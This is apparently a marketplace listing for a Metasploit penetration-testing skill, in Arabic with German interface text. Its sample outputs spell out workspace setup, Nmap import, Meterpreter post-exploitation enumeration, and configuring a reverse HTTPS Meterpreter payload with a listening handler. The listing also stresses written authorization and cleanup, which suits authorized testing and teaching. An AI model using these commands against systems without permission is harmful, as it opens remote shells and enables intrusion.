pentest-metasploit
دليل اختبار الاختراق باستخدام إطار عمل Metasploit
تعلم إجراء اختبارات الاختراق المصرح بها باستخدام إطار عمل Metasploit. توفر هذه المهارة مهام منظمة لتطوير الاستغلال والتحقق من الثغرات وعمليات الفريق الأحمر مع إرشادات مناسبة للتفويض والامتثال.
Die Skill-ZIP herunterladen
In Claude hochladen
Gehe zu Einstellungen → Fähigkeiten → Skills → Skill hochladen
Einschalten und loslegen
Teste es
Verwendung von "pentest-metasploit". كيف أعد مساحة عمل Metasploit للاختبار وأستورد نتائج فحص Nmap؟
Erwartetes Ergebnis:
- إنشاء مساحة عمل مخصصة: workspace -a <engagement-name>
- استيراد نتائج Nmap: db_import /path/to/nmap-scan.xml
- التحقق من المضيفين: أمر hosts
- عرض الخدمات: أمر services
- علامات Nmap الموصى بها لـ Metasploit: db_nmap -sV -sC -O <target>
Verwendung von "pentest-metasploit". ما أوامر ما بعد الاستغلال التي يجب تشغيلها أولاً بعد الحصول على جلسة Meterpreter؟
Erwartetes Ergebnis:
- التحقق من الجلسة: getuid (يظهر المستخدم الحالي)
- معلومات النظام: sysinfo (نظام التشغيل، البنية)
- التحقق من الامتيازات: getprivs (الأذونات المتاحة)
- تكوين الشبكة: ipconfig, route (جدول التوجيه)
- قائمة العمليات: ps (العمليات الجارية للهجرة)
- التحقق من برنامج مكافحة الفيروسات: run post/windows/gather/enum_av_excluded
Verwendung von "pentest-metasploit". كيف أكون حمولة Meterpreter HTTPS عكسي لنظام Windows؟
Erwartetes Ergebnis:
- تعيين الحمولة: set PAYLOAD windows/x64/meterpreter/reverse_https
- تكوين جهاز الاستقبال: set LHOST <your-ip>
- منفذ جهاز الاستقبال: set LPORT 443
- التحقق من الخيارات: show options
- بدء المعالج: use exploit/multi/handler ثم run
Sicherheitsaudit
Niedriges RisikoThis is a pure documentation skill providing Metasploit Framework guidance. Contains no executable code, scripts, or network operations. All static findings are false positives - the scanner detects security tool names and techniques in educational documentation that would only be dangerous if executed. The skill emphasizes legal compliance and authorization requirements throughout.
Risikofaktoren
⚙️ Externe Befehle (85)
🌐 Netzwerkzugriff (26)
📁 Dateisystemzugriff (2)
🔑 Umgebungsvariablen (27)
⚡ Enthält Skripte (2)
Qualitätsbewertung
Was du bauen kannst
اختبار الاختراق المصرح به
إجراء اختبارات اختراق منظمة مع تحديد النطاق المناسب والتوثيق التفويضي والامتثال لمعايير الأمان مثل PTES و OWASP.
عمليات الفريق الأحمر
التخطيط وتنفيذ تمارين الفريق الأحمر بما في ذلك تقديم الاستغلال وما بعد الاستغلال وتقييمات الحركة الجانبية مع إرشادات الأمان العملياتي.
بحث الثغرات
إثبات تأثير الاستغلال والتحقق من الثغرات في بيئات بحث خاضعة للرقابة مع التفويض والتوثيق المناسبين.
Probiere diese Prompts
أرني كيفية تهيئة إطار عمل Metasploit وتشغيل قاعدة بيانات PostgreSQL والتحقق من الاتصال لاختبار اختراق
كيف أختار وحدة استغلال مناسبة في Metasploit وأكوين خيارات الهدف وأعد حمولة HTTPS عكسي وأنفذ الاستغلال
ما أوامر Meterpreter الأساسية لجمع معلومات النظام وتعداد العمليات وتحديد فرص رفع الامتيازات بعد الحصول على جلسة
خصص أنشطة Metasploit الشائعة مثل الوصول الأولي والوصول إلى بيانات الاعتماد والحركة الجانبية لتقنيات وتكتيكات MITRE ATT&CK المحددة
Bewährte Verfahren
- تحقق دائمًا من التفويض المكتوب من مالكي الأصول قبل إجراء أي أنشطة اختبار اختراق على الأنظمة
- وثيق جميع الأوامر المنفذة والنتائج المكتشفة والأدلة المجمعة لإعداد تقارير الامثال والحماية القانونية
- خصص الأنشطة لإطار عمل MITRE ATT&CK لفهم تقنيات الخصوم وتحسين قدرات الاكتشاف
- أغلق جميع الجلسات بشكل نظيف وأزل آثار الاستغلال بعد إكمال تقييم المهمة
Vermeiden
- اختبار الأنظمة دون تفويض كتابي صريح - هذا غير قانوني وقد يؤدي إلى الملاحقة الجنائية
- الفشل في توثيق حدود النطاق أثناء المهمة - قد يؤدي إلى انتهاكات الامثال والمسؤولية القانونية
- ترك الجلسات النشطة أو آليات الاستمرارية بعد التقييم - قم دائمًا بتنظيف جميع آثار Metasploit